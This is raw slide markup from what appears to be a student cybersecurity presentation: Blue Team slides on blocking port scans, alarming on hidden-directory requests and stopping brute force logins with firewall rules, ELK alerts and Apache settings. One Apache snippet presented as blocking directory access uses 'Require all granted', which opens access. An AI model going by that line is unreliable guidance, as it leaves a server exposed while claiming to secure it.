              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="563388" y="1512644"/>
            <a:ext cx="2060864" cy="1641596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Graphical user interface, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C58864-B4F0-ECFD-3223-277AAA0EDAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="471949" y="3154240"/>
            <a:ext cx="6877887" cy="1446582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Chart, waterfall chart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56BB4E2-1665-C745-7A9F-00B9189300F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5909601" y="1390485"/>
            <a:ext cx="1572692" cy="63834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5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marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p5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This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p5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27" name="Google Shape;1027;p5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8" name="Google Shape;1028;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1029" name="Google Shape;1029;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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30" name="Google Shape;1030;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="34032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 name="Google Shape;1031;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Google Shape;1032;p55"/>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33" name="Google Shape;1033;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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1034;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1035" name="Google Shape;1035;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="6213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36" name="Google Shape;1036;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1038" name="Google Shape;1038;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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39" name="Google Shape;1039;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="34032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0" name="Google Shape;1040;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12450" y="137882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Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="Google Shape;1041;p5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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="2233550"/>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45" name="Google Shape;1045;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150" y="30762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46" name="Google Shape;1046;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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1199" name="Google Shape;1199;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="202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Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">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201" name="Google Shape;1201;p6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20</a:t>
            </a:fld>
            <a:endParaRPr sz="6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7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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p7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09" name="Google Shape;1209;p70"/>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000" b="1" dirty="0"/>
              <a:t>What configurations can be set on the host to mitigate port scans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Enable only service ports as required ie. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>orts 443 and 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Configure firewall to look for port scan behaviour and block those IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Enable the SIEM functionality within the ELK stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Configure the server not to answer ICMP queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Create IP tables to enable effective control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Please refer to reference 1</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1AC0E06-BE04-A2FE-E641-B6B790C8617F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="224852" y="1439056"/>
            <a:ext cx="4061248" cy="3465194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" b="1" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future port scans?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Set an alert to detect a large number of connections attempted within a short amount of time between a source and webserver, where the target port is always changing from connection to connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>If a host has established within 30 seconds time range, more than 50 connection each using a different port against another host, we will call this a portscan.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="10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Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p7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16" name="Google Shape;1216;p71"/>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000" b="1" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Configure an alarm if hidden directories are requested from outside the companies' network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>The threshold should be set to 1 as nobody should be able to access this resource from outside the designated corporate network.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p71"/>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000" b="1" dirty="0"/>
              <a:t>What configuration can be set on the host to block unwanted access?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Stronger usernames and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Implement stronger password hashing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Enable multifactor authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Remove vunerable data from the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>Disable directory listing in Apache 2</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0"/>
              <a:t>Describe the solution. If possible, provide required command lines. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>un the following command to disable the root directory</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>&lt;Directory /var/www/html&gt; Options –Indexes &lt;/Directory&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Run the following command to block directory access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>         &lt;Directory "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/local/httpd"&gt;Require all granted&lt;/Directory&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Please refer to references 2, 6, and 9 </a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="10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None/>
            </a:pPr>
            <a:endParaRPr sz="1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Mitigation: Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;p7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24" name="Google Shape;1224;p72"/>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000" b="1" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Define an alarm for HTTP 401 (Unauthorised) responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Define an alarm for malicious user agents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>Enable Elastic Stacks detection rules iaw documentation.  Refer to references 4, 6, 8, 9, 10, and 11 and 14</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>An appropriate threshold would be 15 failed attempts from a single IP address within 5 minutes.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p72"/>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000" b="1" dirty="0"/>
              <a:t>What configuration can be set on the host to block brute force attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
